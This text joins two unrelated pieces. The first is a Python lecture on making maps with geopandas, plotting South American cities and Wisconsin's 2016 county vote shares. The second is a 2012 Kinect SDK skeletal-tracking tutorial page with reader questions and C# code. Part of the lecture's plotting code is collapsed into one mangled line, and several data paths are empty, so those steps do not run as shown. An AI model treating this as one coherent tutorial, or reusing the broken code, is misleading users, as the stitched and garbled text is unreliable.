Mapping in Python
Co-author
Prerequisites
Outcomes
Use geopandas to create maps
# Uncomment following line to install on colab
#! pip install fiona geopandas xgboost gensim folium pyLDAvis descartes
import geopandas as gpd
import matplotlib.pyplot as plt
import pandas as pd
from shapely.geometry import Point

%matplotlib inline
In this lecture, we will use a new package, geopandas, to create maps.
Maps are really quite complicated: we are trying to project a spherical surface onto a flat figure, which inevitably distorts shapes, areas, or distances.
Luckily, geopandas will do most of the heavy lifting for us.
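To get a taste of what a projection actually does, here is a standalone sketch (not from the lecture; pure Python) of the spherical Web Mercator forward projection, which maps longitude/latitude in degrees to planar x/y coordinates in meters:

```python
import math

def web_mercator(lon_deg, lat_deg):
    """Spherical Web Mercator forward projection (the one used by most
    web map tiles): longitude/latitude in degrees -> planar meters."""
    R = 6378137.0  # sphere radius used by Web Mercator, in meters
    x = R * math.radians(lon_deg)
    y = R * math.log(math.tan(math.pi / 4 + math.radians(lat_deg) / 2))
    return x, y

# Buenos Aires (longitude -58.66, latitude -34.58) lands in the
# bottom-left quadrant of the projected plane: x < 0 and y < 0.
x, y = web_mercator(-58.66, -34.58)
print(x < 0, y < 0)  # True True
```

In practice you would not hand-roll this: geopandas stores a coordinate reference system on each GeoDataFrame and reprojects with `to_crs` (e.g. `gdf.to_crs(epsg=3857)`).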
Let’s start with a DataFrame that has the latitude and longitude coordinates of various South American cities.
Our goal is to turn them into something we can plot – in this case, a GeoDataFrame.
df = pd.DataFrame({
    'City': ['Buenos Aires', 'Brasilia', 'Santiago', 'Bogota', 'Caracas'],
    'Country': ['Argentina', 'Brazil', 'Chile', 'Colombia', 'Venezuela'],
    'Latitude': [-34.58, -15.78, -33.45, 4.60, 10.48],
    'Longitude': [-58.66, -47.91, -70.66, -74.08, -66.86]
})
In order to map the cities, we need tuples of coordinates.
We generate them by zipping the latitude and longitude together to store them in a new column named Coordinates.
df["Coordinates"] = list(zip(df.Longitude, df.Latitude))
df.head()
Our next step is to turn the tuple into a Shapely Point object. We will do this by applying Shapely's Point constructor to the Coordinates column.
df["Coordinates"] = df["Coordinates"].apply(Point)
df.head()
Finally, we will convert our DataFrame into a GeoDataFrame by calling the geopandas.GeoDataFrame constructor.
Conveniently, a GeoDataFrame behaves like a normal DataFrame but also understands how to plot its geometry on maps.
In the code below, we must specify the column that contains the geometry data.
gdf = gpd.GeoDataFrame(df, geometry="Coordinates")
gdf.head()
# Doesn't look different than a vanilla DataFrame... let's make sure we have what we want
print('gdf is of type:', type(gdf))

# And how can we tell which column is the geometry column?
print('\nThe geometry column is:', gdf.geometry.name)
gdf is of type: <class 'geopandas.geodataframe.GeoDataFrame'>

The geometry column is: Coordinates
Plotting a Map
Great, now we have our points in the GeoDataFrame.
Let’s plot the locations on a map.
This will require 3 steps:
Get the map
Plot the map
Plot the points (our cities) on the map
1. Get the map
An organization called Natural Earth compiled the map data that we use here.
The file provides the outlines of countries, over which we’ll plot the city locations from our GeoDataFrame.
Luckily, geopandas already comes bundled with this data, so we don't have to hunt it down!
# Grab low resolution world file
world = gpd.read_file(gpd.datasets.get_path("naturalearth_lowres"))
world = world.set_index("iso_a3")
world.head()
world is a GeoDataFrame with the following columns:
pop_est: Contains a population estimate for the country
continent: The country’s continent
name: The country’s name
iso_a3: The country’s 3 letter abbreviation (we made this the index)
gdp_md_est: An estimate of country’s GDP
geometry: A POLYGON for each country (we will learn more about these soon)
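As a quick illustration of how you might combine these columns, here is a toy sketch with made-up numbers (only the column names come from the dataset; gdp_md_est is expressed in millions of US dollars):

```python
import pandas as pd

# Hypothetical values for two countries, keyed by iso_a3 like `world`
world_toy = pd.DataFrame(
    {"pop_est": [45_000_000, 19_000_000],
     "gdp_md_est": [450_000, 480_000]},
    index=["ARG", "CHL"],
)

# GDP per capita: convert millions of dollars to dollars, divide by population
world_toy["gdp_per_cap"] = world_toy["gdp_md_est"] * 1e6 / world_toy["pop_est"]
print(world_toy["gdp_per_cap"])
```

The same one-liner works on the real `world` GeoDataFrame, since a GeoDataFrame supports ordinary column arithmetic.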
world.geometry.name
'geometry'
Notice that the geometry for this GeoDataFrame is stored in the geometry column.
A quick note about polygons
Instead of points (as our cities are), the geometry objects are now polygons.
A polygon is what you already likely think it is – a collection of ordered points connected by straight lines.
The smaller the distance between the points, the more readily the polygon can approximate non-linear shapes.
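To see the point about vertex spacing concretely, here is a standalone sketch (pure Python, no geopandas) that approximates a unit circle with regular polygons: as the number of vertices grows, the polygon's area approaches π.

```python
import math

def ngon_area(n, r=1.0):
    """Area of a regular n-gon inscribed in a circle of radius r,
    computed from its vertex coordinates via the shoelace formula."""
    pts = [(r * math.cos(2 * math.pi * k / n),
            r * math.sin(2 * math.pi * k / n)) for k in range(n)]
    shoelace = sum(x1 * y2 - x2 * y1
                   for (x1, y1), (x2, y2) in zip(pts, pts[1:] + pts[:1]))
    return abs(shoelace) / 2

for n in (4, 24, 360):
    print(n, round(ngon_area(n), 4))  # area approaches pi (~3.1416)
```

This is exactly why country outlines with more exterior points can trace wigglier coastlines.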
Let’s see an example of a polygon.
world.loc["ALB", 'geometry']
Notice that it displayed the country of Albania.
# Returns two arrays that hold the x and y coordinates of the points that define the polygon's exterior.
x, y = world.loc["ALB", "geometry"].exterior.coords.xy

# How many points?
print('Points in the exterior of Albania:', len(x))
Points in the exterior of Albania: 24
Let’s see another
world.loc["AFG", "geometry"]
# Returns two arrays that hold the x and y coordinates of the points that define the polygon's exterior.
x, y = world.loc["AFG", 'geometry'].exterior.coords.xy

# How many points?
print('Points in the exterior of Afghanistan:', len(x))
Points in the exterior of Afghanistan: 69
Notice that we’ve now displayed Afghanistan.
This is a more complex shape than Albania and thus required more points.
2. Plot the map
fig, gax = plt.subplots(figsize=(10, 10))

# By only plotting rows in which the continent is 'South America' we only plot SA.
world.query("continent == 'South America'").plot(ax=gax, edgecolor='black', color='white')

# By the way, if you haven't read the book 'Longitude' by Dava Sobel, you should...
gax.set_xlabel('longitude')
gax.set_ylabel('latitude')

gax.spines['top'].set_visible(False)
gax.spines['right'].set_visible(False)

plt.show()
Creating this map may have been easier than you expected!
In reality, a lot of heavy lifting is going on behind the scenes.
Entire university classes (and even majors!) focus on the theory and thought that goes into creating maps, but, for now, we are happy to rely on the work done by the experts behind geopandas and its related libraries.
3. Plot the cities
In the code below, we run the same commands as before to plot the South American countries, but now we also plot the data in gdf, which contains the locations of South American cities.
fig, gax = plt.subplots(figsize=(10, 10))
world.query("continent == 'South America'").plot(ax=gax, edgecolor='black', color='white')

# Plot the cities on top of the country outlines
gdf.plot(ax=gax, color='red')

gax.set_xlabel('longitude')
gax.set_ylabel('latitude')
gax.spines['top'].set_visible(False)
gax.spines['right'].set_visible(False)
plt.show()
Adding labels to points.
Finally, we might want to consider annotating the cities so we know which cities are which.
#') # Kill the spines... gax.spines['top'].set_visible(False) gax.spines['right'].set_visible(False) # ...or get rid of all the axis. Is it important to know the lat and long? # plt.axis('off') # Label the cities for x, y, label in zip(gdf['Coordinates'].x, gdf['Coordinates'].y, gdf['City']): gax.annotate(label, xy=(x,y), xytext=(4,4), textcoords='offset points') plt.show()
Case Study: Voting in Wisconsin
In the example that follows, we will demonstrate how each county in Wisconsin voted during the 2016 Presidential Election.
Along the way, we will learn a couple of valuable lessons:
Where to find shape files for US states and counties
How to match census style data to shape files
Find and Plot State Border
Our first step will be to find the border for the state of interest. This can be found on the US Census’s website here.
You can download the cb_2016_us_state_5m.zip by hand, or simply allow geopandas to extract the relevant information from the zip file online.
state_df = gpd.read_file("")
state_df.head()
print(state_df.columns)
Index(['STATEFP', 'STATENS', 'AFFGEOID', 'GEOID', 'STUSPS', 'NAME', 'LSAD', 'ALAND', 'AWATER', 'geometry'], dtype='object')
We have various columns, but, most importantly, we can find the right geometry by filtering by name.
fig, gax = plt.subplots(figsize=(10, 10))
state_df.query("NAME == 'Wisconsin'").plot(ax=gax, edgecolor="black", color="white")
plt.show()
Find and Plot County Borders
Next, we will add the county borders to our map.
The county shape files (for the entire US) can be found on the Census site.
Once again, we will use the 5m resolution.
county_df = gpd.read_file("")
county_df.head()
print(county_df.columns)
Index(['STATEFP', 'COUNTYFP', 'COUNTYNS', 'AFFGEOID', 'GEOID', 'NAME', 'LSAD', 'ALAND', 'AWATER', 'geometry'], dtype='object')
Wisconsin’s FIPS code is 55 so we will make sure that we only keep those counties.
county_df = county_df.query("STATEFP == '55'")
Now we can plot all counties in Wisconsin.
fig, gax = plt.subplots(figsize=(10, 10))
state_df.query("NAME == 'Wisconsin'").plot(ax=gax, edgecolor="black", color="white")
county_df.plot(ax=gax, edgecolor="black", color="white")
plt.show()
Get Vote Data
The final step is to get the vote data, which can be found online on this site.
Our friend Kim says,
Go ahead and open up the file. It's a mess! I saved a cleaned up version of the file to results.csv, which we can use to skip the hassle of cleaning the data. For fun, you should load the raw data and try beating it into shape. That's what you normally would have to do… and it's fun.
We’d like to add that such an exercise is also “good for you” (similar to how vegetables are good for you).
But, for the example in class, we’ll simply start with his cleaned data.
results = pd.read_csv("", thousands=",")
results.head()
Notice that this is NOT a GeoDataFrame; it has no geographical information.
But it does have the names of each county.
We will be able to use this to match to the counties from
county_df.
First, we need to finish up the data cleaning.
results["county"] = results["county"].str.title()
results["county"] = results["county"].str.strip()
county_df["NAME"] = county_df["NAME"].str.title()
county_df["NAME"] = county_df["NAME"].str.strip()
Then, we can merge election results with the county data.
res_w_states = county_df.merge(results, left_on="NAME", right_on="county", how="inner")
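The reason for the .str.title() and .str.strip() calls: an inner merge keeps only exact string matches, so a stray space or different casing silently drops counties. A minimal sketch with hypothetical county frames (the vote totals are made up):

```python
import pandas as pd

# Hypothetical frames whose name columns differ in case and whitespace
shapes = pd.DataFrame({"NAME": ["DANE ", "milwaukee"], "id": [1, 2]})
votes = pd.DataFrame({"county": ["Dane", "Milwaukee"], "total": [309_000, 441_000]})

# Without normalization, nothing matches
no_norm = shapes.merge(votes, left_on="NAME", right_on="county", how="inner")
print(len(no_norm))  # 0

# After normalizing both sides, every county matches
shapes["NAME"] = shapes["NAME"].str.strip().str.title()
merged = shapes.merge(votes, left_on="NAME", right_on="county", how="inner")
print(merged["NAME"].tolist())  # ['Dane', 'Milwaukee']
```

A good habit after any merge like this is to compare row counts before and after, so silent drops don't go unnoticed.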
Next, we'll create two new variables: trump_share, the share of all votes that Donald Trump won during the election, and rel_trump_share, his share of the two-party (Trump plus Clinton) vote.
res_w_states["trump_share"] = res_w_states["trump"] / (res_w_states["total"])
res_w_states["rel_trump_share"] = res_w_states["trump"] / (res_w_states["trump"] + res_w_states["clinton"])
res_w_states.head()
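The two shares differ whenever third-party ballots are present: trump_share divides by all ballots, while rel_trump_share divides by the two-party total only. A quick sketch with made-up numbers:

```python
# Hypothetical county: 50,000 ballots, 4,000 of them third-party
trump, clinton, total = 26_000, 20_000, 50_000

trump_share = trump / total                  # share of all ballots
rel_trump_share = trump / (trump + clinton)  # share of the two-party vote

print(round(trump_share, 3), round(rel_trump_share, 3))  # 0.52 0.565
```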
Finally, we can create our map.
fig, gax = plt.subplots(figsize=(10, 8))

# Plot the state
state_df[state_df['NAME'] == 'Wisconsin'].plot(ax=gax, edgecolor='black', color='white')

# Plot the counties and pass 'rel_trump_share' as the data to color
res_w_states.plot(
    ax=gax, edgecolor='black', column='rel_trump_share',
    legend=True, cmap='RdBu_r', vmin=0.2, vmax=0.8
)

# Add text to let people know what we are plotting
gax.annotate('Republican vote share', xy=(0.76, 0.06), xycoords='figure fraction')

# I don't want the axis with long and lat
plt.axis('off')
plt.show()
What do you see from this map?
How many counties did Trump win? How many did Clinton win?
res_w_states.eval("trump > clinton").sum()
60
res_w_states.eval("clinton > trump").sum()
12
Who had more votes? Do you think a comparison in counties won or votes won is more reasonable? Why do you think they diverge?
res_w_states["trump"].sum()
1405284
res_w_states["clinton"].sum()
1382536
What story could you tell about this divergence?
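One way to see how a county count and a vote count can diverge: wins spread across many small counties can be outweighed by a single populous one. A toy illustration (entirely made-up numbers) in which candidate A carries three counties out of four yet loses the statewide vote:

```python
counties = [
    {"name": "Rural 1", "a": 6_000,  "b": 4_000},
    {"name": "Rural 2", "a": 5_500,  "b": 4_500},
    {"name": "Rural 3", "a": 7_000,  "b": 3_000},
    {"name": "Metro",   "a": 40_000, "b": 60_000},
]

a_counties = sum(c["a"] > c["b"] for c in counties)
b_counties = sum(c["b"] > c["a"] for c in counties)
a_votes = sum(c["a"] for c in counties)
b_votes = sum(c["b"] for c in counties)

print(a_counties, b_counties)  # 3 1
print(a_votes, b_votes)        # 58500 71500
```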
Interactivity
Multiple Python libraries can help create interactive figures.
Here, we will see an example using bokeh.
In another lecture, we will see an example with folium.
from bokeh.io import output_notebook, show, output_file
from bokeh.plotting import figure, ColumnDataSource
from bokeh.models import GeoJSONDataSource, LinearColorMapper, ColorBar, HoverTool
from bokeh.palettes import brewer
import json

output_notebook()

res_w_states["clinton_share"] = res_w_states["clinton"] / res_w_states["total"]

# Convert data to geojson for bokeh
wi_geojson = GeoJSONDataSource(geojson=res_w_states.to_json())
color_mapper = LinearColorMapper(palette=brewer['RdBu'][10], low=0, high=1)
color_bar = ColorBar(color_mapper=color_mapper, label_standoff=8, width=500, height=20,
                     border_line_color=None, location=(0, 0), orientation='horizontal')
hover = HoverTool(tooltips=[('County', '@county'), ('Portion Trump', '@trump_share'),
                            ('Portion Clinton', '@clinton_share'), ('Total', '@total')])
p = figure(title="Wisconsin Voting in 2016 Presidential Election", tools=[hover])
p.patches("xs", "ys", source=wi_geojson,
          fill_color={'field': 'rel_trump_share', 'transform': color_mapper})
p.add_layout(color_bar, 'below')
show(p)
Skeletal Tracking Fundamentals
- Posted: Feb 01, 2012 at 5:46 AM
- 92,218 Views
- 90 Comments
In this skeletal tracking Quickstart series video, we discuss the fundamentals of skeletal tracking with the Kinect SDK.
@myChan: Try adding a break point only when TrackingState = Tracked. I don't understand how the scaledJoint value could ever be set to a HipJoint if there is no TrackingState. Can you post the code that you're using and we'll see if we can't figure out what's going on?
@myChan: Just so I understand the problem, when you put a breakpoint in the ScalePosition method, and before you execute the method, the value of Joint is a HipCenter and it's position is not tracked?
@Dan: Definitely. Can you explain why this happens? I can't find the reason. Thanks!
I solve the problem. Thanks for your help!
So I followed your tutorial and cannot get the ScaleTo method to recognize for the Joint. Any idea why? I went and downloaded the sample code, but still cannot get it to work. What did you do myChan?
@Dan:
hi... I was just wondering how to do the hover button with SDK v1?
refer link:
anyone knows?
need help. thanks
@Blas: I think you should check the GetCameraPoint() method. To scale the skeleton's position, the CameraPosition() call must be commented out. And after you uncomment the ScaledPosition() call in the sensor_AllFramesReady event, you will get the right result!
hi!
@myChan:
thanks! problem solved.
hmm... but how about hovering over a button to select/click a target?
I tried that, but nothing. I have your code exactly; it's just the one line (line 180 of my code) where you call the joint.ScaleTo(1280, 720) method. It isn't recognizing the ScaleTo method even though I just downloaded this: But it's still not working for me. Where is the ScaleTo method in Joint?
@kendrick0772: Maybe you can get some inspiration here. Check this out.
@myChan Well I can't do that... like I said, I get an error with the ScaleTo method saying that it does not exist. Where is it? Where can I find it? Why does that error not show up in his code?
Never mind it works fine now!
Hello. I have problems with speed. You can find all details at
Do you have a solution?
Are there any sample code in C++ to get the X, Y, Z coordinate of the joints?
If I wanted to add images to the Camera and interact with them, how would I be able to detect if my either hands are touching the image? I tried using the PointToScreen method but I do not think this will work. Any ideas?
Hello Dan,
I have the same question as Mattia De Rosa.
"
Just to summarize is it possible to capture the hand gestures of a person seated behind a desk?
Thanks,
Vijay
@myChan:
how are u?
thanks for the reply!!! wonderful!
hmmm, i got questions to ask!
in the latest sdk v1.
how do you make the cursor move no matter whether you are using the left or right hand?
any sample code for that?
anyone knows?
thanks in advance!
Thanks for the tutorial!
Using sensor.SkeletonStream.Enable() (no 'smoothing' parameters then), I still have a significant delay. Can I further improve the response?
Or maybe it is a problem with my not-so-efficient laptop?
Thanks in advance ;)
Hi Dan,
Thanks a lot for your support with these tutorials; they are helpful. I'm trying to build an application in which I need to detect the pixel color. Do you know how to do that?
Thanks,
Regards.
Hi Dan,
For my application I would really like to be able to scale the joint distance, but the ScaleTo method isn't recognized for the Joint.
It's this line I'm having trouble with:
Joint scaledJoint = joint.ScaleTo(1280, 720);
ScaleTo is not recognized. Is it because I'm missing a library or something of the sort?
Thanks,
Cheers!
Paola
Good news: we just recently announced the Kinect SDK 1.5, which will allow seated skeletal tracking! You can read the full blog post here; the part most relevant to your question is that seated mode tracks the upper-body joints while the user is sitting down.
Yes, check out the C++ Skeletal Viewer example that ships in the SDK. You can filter by language and select just C++ samples in the Kinect for Windows SDK Sample Browser app that ships with the SDK.
Cheers,
-Dan
Hmm, for a baseline, can you try running the Kinect Explorer app and seeing what the Frames Per Second (FPS) number you get is? The FPS number is located under the depth camera in that sample.
Yes, in the Camera Fundamentals video we show how to get all of the pixels into a byte array.
You can loop through that byte array to get the color of each pixel. At a high level, the array is structured so that the data for the first point (0,0) comes first, and each pixel has four bytes representing its color in the BGR32 format (Blue, Green, Red, plus one empty byte).
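To make that layout concrete, here is a small sketch (in Python rather than C#, with a hypothetical 2x2 image) of reading and writing pixels in a BGR32-style byte array, where each pixel occupies four bytes:

```python
width, height = 2, 2
pixels = bytearray(width * height * 4)  # 4 bytes per pixel: B, G, R, unused

def set_pixel(x, y, b, g, r):
    i = (y * width + x) * 4  # row-major offset of the pixel's first byte
    pixels[i], pixels[i + 1], pixels[i + 2] = b, g, r

def get_pixel(x, y):
    i = (y * width + x) * 4
    return pixels[i], pixels[i + 1], pixels[i + 2]  # (B, G, R)

set_pixel(1, 0, 255, 0, 0)  # pure blue at (x=1, y=0)
print(get_pixel(1, 0))      # (255, 0, 0)
```

The same row-major offset arithmetic applies to the C# byte array the SDK fills in, whatever language you index it from.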
Hope this helps,
-Dan
Yes, make sure you have a reference to the c4ftoolkit project in the list of references for the project. If you don't, it is available in the dependencies folder of the Quickstarts download or available here -
Hi Dan,
Is it possible to limit the tracking to just one skeleton, so that when two or more skeletons appear in front of the kinect, only the skeleton which is recognized first is continued to be tracked? Thanks!
Hello Dan
Is it possible to get the skeleton coordinates given just a depth image. There is no Kinect involved.
Hey help plz :) how to get how many skeletons count in frame
Quoting the question from Apr 02, 2012 at 12:01 PM:

"Hi Dan, is it possible to limit the tracking to just one skeleton, so that when two or more skeletons appear in front of the Kinect, only the skeleton which is recognized first continues to be tracked? Thanks!"
Yes, the API you'll want to use is SkeletonStream.ChooseSkeletons() which takes one (to track one) or two integers representing which players you want to use for skeletal tracking. The other thing you'll want to do is decide how you want to choose which skeleton you should track. You can do this in a number of ways based on your app, you may need to be a certain distance from the Kinect, so you can get the distance of each player and remove any players not at the correct distance, or you can, similar to Xbox games, have a menu to select the player where the person playing raises their hand over their head and you loop through setting the tracked skeletons (check 1 & 2, check 3&4, check 5&6) and see which of the six skeletons have their hand joint above their head joint.
Hope this helps,
-Dan
@Mindaugas:
The current API will always return an array of six skeletons, even if there is only one person in the room. You will know which of the six is an actual person by checking the TrackingState of the skeleton.
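The selection logic described here — a fixed array of six slots, of which only the actually-tracked entries matter — can be sketched outside C# as well. A minimal Python analogue (hypothetical data) of the FirstOrDefault query used in the sample code:

```python
TRACKED, NOT_TRACKED = "Tracked", "NotTracked"

# Six slots, as the Kinect API always returns, with one real person
all_skeletons = [
    {"id": 1, "state": NOT_TRACKED},
    {"id": 2, "state": TRACKED},
] + [{"id": i, "state": NOT_TRACKED} for i in (3, 4, 5, 6)]

# First tracked skeleton, or None if nobody is in frame
first = next((s for s in all_skeletons if s["state"] == TRACKED), None)
print(first["id"] if first is not None else None)  # 2
```

The "or None" default is the important part: code that assumes a tracked skeleton always exists is what produces the NullReferenceException questions later in this thread.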
Sir, this tutorial is really very helpful. What I wanted to ask is how we can perform the button click function using a hand gesture.
Please guide me about it.
Instead of using a built-in button, I'd suggest building your own button control. We have an example user control of this in the Coding4Fun Kinect Toolkit under WPF/Controls/HoverButton.
Hope this helps, - Dan
Can you plz upload a tutorial on how to use this control in an app?
Hi,
Does anyone know the maximum distance a person can be from the Kinect and still be picked up by skeleton tracking?
@Pramod: Find the detailed answer in the depth video =)
If I remember well, it should be 1 to 4 meters for the Xbox 360 Kinect (default mode)
and 0.5 to 3 meters for the Kinect for Windows, which has near mode enabled.
Check the video out
@Myra: Try using Ray Chambers video to guide you in the process. It helped me.
Hi @Dan
Have you ever tried making this app using navigation windows in wpf? I tried but for some reason it doesn't work.
@ Dan
Hello Dan,
I have an important question. I'm a student, and we are working on a Kinect project. Your videos are great and give a good introduction to programming with the Kinect.
I have a problem in the skeleton tracking project: if I switch the ColorViewer to autosize and maximize the window, the ellipses on the hands are no longer in the right position. Can you tell me how to make my app resizable?
SKELETON TRACKING PROBLEM
Hi, I've tried the demo you provided, and I've got problems with the skeleton tracking. The example is not working well; I've even tried to copy the complete code, but it still doesn't work. Checking variables with breakpoints (first, allSkeletons, ...), it appears skeletons are not tracked.
Does anyone know the reason why, or have an idea?
Thank you in advance
near
SOLVED
Hello
I want to track Hip Joints for 6 skeletons. Can anyone help with the code?
Hey, I need a bit of help here. Bear with me, I'm very new to C#. The video kind of jumps straight to the code. I just have a problem setting the ellipses. They don't move. I don't know how to bind them properly. How do you get the ellipses to move after you create them??
@Dan
Thanks a lot for that awesome Tutorial. I have been trying to apply it in my project but i kept receiving this warning which says "Warning: An ImageFrame instance was not Disposed." I am sure that i disposed all the frames that I created. Can you please help ?!
Here is my code:
using Coding4Fun.Kinect.Wpf;
using System.Diagnostics;
using System.IO;
namespace KinectSkeleton
{
/// <summary>
/// Interaction logic for MainWindow.xaml
/// </summary>
public partial class MainWindow : Window
{
public MainWindow()
{
InitializeComponent();
}
bool closing = false;
const int skeletonCount = 6;
Skeleton[] allSkeletons = new Skeleton[skeletonCount];
private void Window_Loaded(object sender, RoutedEventArgs e)
{
myKinectSensorChooser.KinectSensorChanged += new DependencyPropertyChangedEventHandler(myKinectSensorChooser_KinectSensorChanged);
}
void myKinectSensorChooser_KinectSensorChanged(object sender, DependencyPropertyChangedEventArgs e)
{
KinectSensor oldSensor = (KinectSensor)e.OldValue;
if (oldSensor != null)
{
oldSensor.Stop();
oldSensor.AudioSource.Stop();
}
KinectSensor mySensor = (KinectSensor)e.NewValue;
if (mySensor == null)
return;
mySensor.DepthStream.Enable(DepthImageFormat.Resolution320x240Fps30);
mySensor.ColorStream.Enable();
mySensor.SkeletonStream.Enable();
mySensor.AllFramesReady += new EventHandler<AllFramesReadyEventArgs>(mySensor_AllFramesReady);
try
{
mySensor.Start();
Debug.WriteLine("Starting Sensor .....");
Debug.WriteLine("The Current Elevation Angle is: " + mySensor.ElevationAngle.ToString());
mySensor.ElevationAngle = 0;
}
catch (System.IO.IOException)
{
//another app is using Kinect
myKinectSensorChooser.AppConflictOccurred();
}
}
void mySensor_AllFramesReady(object sender, AllFramesReadyEventArgs e)
{
if (closing)
return;
byte[] depthImagePixels;
DepthImageFrame depthFrame = e.OpenDepthImageFrame();
if (depthFrame == null)
return;
depthImagePixels = GenerateDepthImage(depthFrame);
int stride = depthFrame.Width*4;
image1.Source =
BitmapSource.Create(depthFrame.Width, depthFrame.Height,
96, 96, PixelFormats.Bgr32, null, depthImagePixels, stride);
//Get a skeleton
Skeleton first = GetFirstSkeleton(e);
if (first == null)
return;
Debug.WriteLine("Head Position is : " + first.Joints[JointType.Head].ToString());
depthFrame.Dispose();
}
private byte[] GenerateDepthImage(DepthImageFrame depthFrame)
{
//get the raw data from the frame with the depth for every pixel
short[] rawDepthData = new short[depthFrame.PixelDataLength];
depthFrame.CopyPixelDataTo(rawDepthData);
//use frame to create the image to display on-screen
//frame contains color information for all pixels in image
//Height x Width x 4 (Red, Green, Blue, empty byte)
Byte[] pixels = new byte[depthFrame.Height * depthFrame.Width * 4];
//hardcoded locations to Blue, Green, Red (BGR) index positions
const int BlueIndex = 0;
const int GreenIndex = 1;
const int RedIndex = 2;
int player, depth;
//loop through all distances
//pick a RGB color based on distance
for (int depthIndex = 0, colorIndex = 0;
depthIndex < rawDepthData.Length && colorIndex < pixels.Length;
depthIndex++, colorIndex += 4)
{
//get the player (requires skeleton tracking enabled for values)
player = rawDepthData[depthIndex] & DepthImageFrame.PlayerIndexBitmask;
//gets the depth value
depth = rawDepthData[depthIndex] >> DepthImageFrame.PlayerIndexBitmaskWidth;
if (player > 0)
{
pixels[colorIndex + BlueIndex] = Colors.Gold.B;
pixels[colorIndex + GreenIndex] = Colors.Gold.G;
pixels[colorIndex + RedIndex] = Colors.Gold.R;
}
else
{
pixels[colorIndex + BlueIndex] = Colors.Green.B;
pixels[colorIndex + GreenIndex] = Colors.Green.G;
pixels[colorIndex + RedIndex] = Colors.Green.R;
}
}
return pixels;
}
Skeleton GetFirstSkeleton(AllFramesReadyEventArgs e)
{
using (SkeletonFrame skeletonFrameData = e.OpenSkeletonFrame())
{
if (skeletonFrameData == null)
{
return null;
}
skeletonFrameData.CopySkeletonDataTo(allSkeletons);
//get the first tracked skeleton
Skeleton first = (from s in allSkeletons
where s.TrackingState == SkeletonTrackingState.Tracked
select s).FirstOrDefault();
return first;
}
}
void StopKinect(KinectSensor sensor)
{
if (sensor != null)
{
if (sensor.IsRunning)
{
sensor.ElevationAngle = 0;
sensor.Stop();
if (sensor.AudioSource != null)
{
sensor.AudioSource.Stop();
}
}
}
}
private void Window_Closing(object sender, System.ComponentModel.CancelEventArgs e)
{
closing = true;
Debug.WriteLine("Closing window...");
StopKinect(myKinectSensorChooser.Kinect);
}
}
}
Hi,@Dan.
I am a student from Tsing Hua University, China. I've been following you tutorial these days. The first four sections went great. However, when I came to the fifth one, which is the Skeletal Tracking Fundamentals, a problem emerged.
I believe I had exactly followed your steps and codes showed in the video, but it just didn't work out. I mean the Image control and the two ellipses I had set on the MainWindow didn't follow my joints, that is my head and two hands as you have specified in the video.
Here is my code as you may want to check it out.
bool closing=false;
const int skeletonCount=6;
Skeleton[] allSkeletons=new Skeleton[skeletonCount];
private void Window_Loaded(object sender, RoutedEventArgs e)
{
kinectSensorChooser1.KinectSensorChanged += new DependencyPropertyChangedEventHandler(kinectSensorChooser1_KinectSensorChanged);
}
void kinectSensorChooser1_KinectSensorChanged(object sender, DependencyPropertyChangedEventArgs e)
{
KinectSensor oldSensor = (KinectSensor)e.OldValue;
StopKinect(oldSensor);
KinectSensor newSensor = (KinectSensor)e.NewValue;
}
}
void newSensor_AllFramesReady(object sender, AllFramesReadyEventArgs e)
{
if(closing)
{
return;
}
Skeleton first=GetFirstSkeleton(e);
if(first==null)
{
return;
}
GetCameraPoint(first,e);
}
void GetCameraPoint(Skeleton first,AllFramesReadyEventArgs e)
{
using(DepthImageFrame depth=e.OpenDepthImageFrame())
{
if(depth==null||kinectSensorChooser1.Kinect==null)
{
return;
}
DepthImagePoint headDepthPoint=
depth.MapFromSkeletonPoint(first.Joints[JointType.Head].Position);
DepthImagePoint leftDepthPoint=
depth.MapFromSkeletonPoint(first.Joints[JointType.HandLeft].Position);
DepthImagePoint rightDepthPoint=
depth.MapFromSkeletonPoint(first.Joints[JointType.HandRight].Position);
ColorImagePoint headColorPoint=
depth.MapToColorImagePoint(headDepthPoint.X,headDepthPoint.Y,
ColorImageFormat.RgbResolution640x480Fps30);
ColorImagePoint leftColorPoint=
depth.MapToColorImagePoint(leftDepthPoint.X,leftDepthPoint.Y,
ColorImageFormat.RgbResolution640x480Fps30);
ColorImagePoint rightColorPoint=
depth.MapToColorImagePoint(rightDepthPoint.X,rightDepthPoint.Y,
ColorImageFormat.RgbResolution640x480Fps30);
CameraPosition(headImage, headColorPoint);
CameraPosition(leftellipse, leftColorPoint);
CameraPosition(rightellipse, rightColorPoint);
}
}
private void CameraPosition(FrameworkElement element, ColorImagePoint point)
{
Canvas.SetLeft(element,point.X-element.Width/2);
Canvas.SetTop(element,point.Y-element.Height/2);
}
Skeleton GetFirstSkeleton(AllFramesReadyEventArgs e)
{
using(SkeletonFrame skeletonFrameData =e.OpenSkeletonFrame())
{
if(skeletonFrameData==null)
{
return null;
}
skeletonFrameData.CopySkeletonDataTo(allSkeletons);
Skeleton first=(from s in allSkeletons
where s.TrackingState==SkeletonTrackingState.Tracked
select s).FirstOrDefault();
return first;
}
}
void StopKinect(KinectSensor sensor)
{
if(sensor!=null)
{
sensor.Stop();
sensor.AudioSource.Stop();
}
}
private void Window_Closing(object sender, System.ComponentModel.CancelEventArgs e)
{
StopKinect(kinectSensorChooser1 .Kinect);
}
private void SetTilt_Click(object sender, RoutedEventArgs e)
{
SetTilt.IsEnabled = false;
if (kinectSensorChooser1.Kinect != null && kinectSensorChooser1.Kinect.IsRunning)
{
kinectSensorChooser1.Kinect.ElevationAngle = (int)slider1.Value;
}
System.Threading.Thread.Sleep(new TimeSpan(hours:0,minutes:0,seconds:1));
SetTilt.IsEnabled = true;
}
private void slider1_ValueChanged(object sender, RoutedPropertyChangedEventArgs<double> e)
{
}
I was wondering if you could help me a little bit. And I would be so grateful.
@Adila & @kinjad: I had a similar problem and it was resolved by removing all 'HorizontalAlignment' and 'VerticalAlignment' properties from the elements you are wanting to move.
Hope that helps,
Hi Dan..
When i try to run my code, which basically tracks my right hand, and ellipses appear on my shoulder, hand and elbow joints, i get an error like this, while running:
"NullReferenceException was unhandled". , on this line of code:
Skeleton skeleton= (from s in allSkeletons where s.TrackingState == SkeletonTrackingState.Tracked select s).FirstOrDefault();
The above line is where the error is highlighted in my code.
Can you help me with this, coz i'm kinda stuck with this for days now..
Thanks in Advance..
The reason this is null is because there is *no* skeleton (or null skeleton) when the app first starts up. What you want to do is do nothing if there is no skeleton.
if (skeleton == null)
{ return; }
hi,
can any1 mail me or upload the code(c++ in opencv) for gesture recognition using kinect.
here is mail id
vikas.mulage@gmail.com
@Vikas Meet me tom
Hi Dan...,
